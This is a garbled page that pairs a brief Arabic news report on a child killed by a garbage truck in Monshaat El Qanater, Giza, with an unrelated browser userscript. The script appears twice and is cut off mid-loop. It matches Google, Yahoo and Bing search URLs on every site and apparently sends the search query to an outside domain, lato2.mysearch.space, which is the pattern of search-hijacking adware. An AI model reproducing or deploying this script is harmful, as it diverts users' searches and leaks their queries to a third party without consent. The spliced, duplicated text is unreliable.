لقى طفل مصرعه بمنشأة القناطر، في محافظة الجيزة، حيث صدمته سيارة خاصة بجمع القمامة، وتم التحفظ على سائق السيارة، وحرر محضر بالواقعة، وتولت النيابة المختصة التحقيق.
تلقت غرفة النجدة، بمديرية أمن الجيزة، بلاغا يفيد مصرع طفل صدمته سيارة بمنشأة القناطر، بإجراء التحريات تبين لرجال المباحث أن الطفل صدمته سيارة خاصة بجمع القمامة.
تم اتخاذ الإجراءات القانونية اللازمة تجاه سائق السيارة، وحرر محضر بالواقعة، وباشرت النيابة المختصة التحقيق.
// ==UserScript==
// @name panda google
// @namespace http://tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author You
// @match *://*/*
// @grant none
// ==/UserScript==
(function() {
function findGetParameter(parameterName) {
var result = null,
tmp = [];
location.search
.substr(1)
.split("&")
.forEach(function (item) {
tmp = item.split("=");
if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]);
});
return result;
}
var u ='https://lato2.mysearch.space?q=',
s = [
{
'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/,
'query':'q',
},
{
'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/,
'query':'p'
},
{
'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/,
'query':'q'
}
]
for(var i = 0; i
// ==UserScript==
// @name panda google
// @namespace http://tampermonkey.net/
// @version 0.1
// @description try to take over the world!
// @author You
// @match *://*/*
// @grant none
// ==/UserScript==
(function() {
function findGetParameter(parameterName) {
var result = null,
tmp = [];
location.search
.substr(1)
.split("&")
.forEach(function (item) {
tmp = item.split("=");
if (tmp[0] === parameterName) result = decodeURIComponent(tmp[1]);
});
return result;
}
var u ='https://lato2.mysearch.space?q=',
s = [
{
'host':/^https?\:\/\/www.google(\.\w+)+\/search\?.*(sourceid\=chrome).*$/,
'query':'q',
},
{
'host':/^(https?\:\/\/)(\w+\.)?(search\.)(yahoo\.)(com)\/(search\?)?(.*)(fr\=crmas).*$/,
'query':'p'
},
{
'host':/^(https?\:\/\/)www\.bing\.com\/(search\?)?(.*)(FORM\=CHROMN).*$/,
'query':'q'
}
]
for(var i = 0; i